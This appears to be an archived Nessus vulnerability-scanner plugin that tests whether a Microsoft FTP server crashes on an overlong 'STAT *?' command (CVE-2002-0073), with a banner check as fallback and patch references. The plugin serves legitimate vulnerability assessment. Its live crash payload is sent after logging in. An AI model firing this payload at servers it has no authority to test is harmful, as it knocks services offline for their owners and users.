home *** CD-ROM | disk | FTP | other *** search
/ Chip 2007 January, February, March & April / Chip-Cover-CD-2007-02.iso / Pakiet bezpieczenstwa / mini Pentoo LiveCD 2006.1 / mpentoo-2006.1.iso / modules / nessus-2.2.8.mo / usr / lib / nessus / plugins / msftp_dos.nasl < prev    next >
Text File  |  2005-01-14  |  3KB  |  117 lines

  1. #
  2. # This script was written by Renaud Deraison <deraison@cvs.nessus.org>
  3. #
  4. # Thanks to: H D Moore
  5. #
  6. # See the Nessus Scripts License for details
  7.  
  8. if(description)
  9. {
  10.  script_id(10934);
  11.  script_bugtraq_id(4482);
  12.  script_cve_id("CVE-2002-0073");
  13.  if(defined_func("script_xref"))script_xref(name:"IAVA", value:"2002-A-0002");
  14.  
  15.  script_version ("$Revision: 1.20 $");
  16.  
  17.  name["english"] = string("MS FTPd DoS");
  18.  
  19.  script_name(english:name["english"]);
  20.          
  21.  desc["english"] = "
  22. It was possible to make the remote FTP server crash
  23. by sending the command 'STAT *?AAAAA....AAAAA'
  24.  
  25. There is a bug in certain versions of Microsoft FTP server
  26. which can be exploited in this fashion.  In addition, other
  27. FTP servers may react adversely to such a string.
  28.  
  29. An attacker may use this flaw to prevent your FTP server
  30. from working properly
  31.  
  32.  
  33. Solution : see http://www.microsoft.com/technet/security/bulletin/ms02-018.mspx
  34.  
  35. CAVEAT: If your FTP server is not a Microsoft product, then contact your FTP
  36. vendor for a patch.
  37.  
  38. Risk factor : Medium";
  39.          
  40.  script_description(english:desc["english"]);
  41.             
  42.  
  43.  script_summary(english:"Checks if the remote ftp can be crashed",
  44.          francais:"DΘtermine si le serveur ftp peut Ωtre plantΘ");
  45.  script_category(ACT_MIXED_ATTACK);
  46.  script_family(english:"FTP");
  47.  script_copyright(english:"This script is Copyright (C) 2002 Renaud Deraison",
  48.            francais:"Ce script est Copyright (C) 2002 Renaud Deraison");
  49.           
  50.  script_dependencies("find_service.nes", "ftp_anonymous.nasl", "iis_asp_overflow.nasl");
  51.  script_require_ports("Services/ftp", 21);
  52.  exit(0);
  53. }
  54.  
  55. #
  56. # The script code starts here : 
  57. #
  58.  
  59. include("ftp_func.inc");
  60.  
  61.  
  62. if ( get_kb_item("Q319733") ) exit(0);
  63.  
  64. port = get_kb_item("Services/ftp");
  65. if(!port)port = 21;
  66.  
  67. if(! get_port_state(port)) exit(0);
  68.  
  69.  
  70. if(!safe_checks())
  71. {
  72.  login = get_kb_item("ftp/login");
  73.  password = get_kb_item("ftp/password");
  74.  if(login)
  75.  {
  76.  # Connect to the FTP server
  77.   soc = open_sock_tcp(port);
  78.   if(soc)
  79.   {  
  80.   if(ftp_log_in(socket:soc, user:login, pass:password))
  81.   {
  82.      # We are in
  83.      c = string("STAT *?", crap(240), "\r\n");
  84.      send(socket:soc, data:c);
  85.      b = ftp_recv_line(socket:soc);
  86.      send(socket:soc, data:string("HELP\r\n"));
  87.      r = ftp_recv_line(socket:soc);
  88.      if(!r)security_warning(port);
  89.      else {
  90.      ftp_close(socket: soc);
  91.      }
  92.     exit(0);
  93.    }
  94.   }
  95.  }
  96. }
  97.  
  98. banner = get_ftp_banner(port: port);
  99. if(banner)
  100. {
  101.  if(egrep(pattern:".*Microsoft FTP Service.*[45]\.0.*$",string:banner))
  102.  {
  103.          report = 
  104. string("It may be possible to make the remote FTP server crash\n",
  105. "by sending the command 'STAT *?AAA...AAA.\n\n",
  106. "An attacker may use this flaw to prevent your site from distributing files\n\n",
  107. "*** Warning : we could not verify this vulnerability.\n",
  108. "*** Nessus solely relied on the banner of this server\n\n",
  109. "Solution : Apply the relevant hotfix from Microsoft\n\n",
  110. "See:http://www.microsoft.com/technet/security/bulletin/ms02-018.mspx\n\n",
  111. "Risk factor : Medium");
  112.           security_warning(port:port, data:report);
  113.    }
  114. }
  115.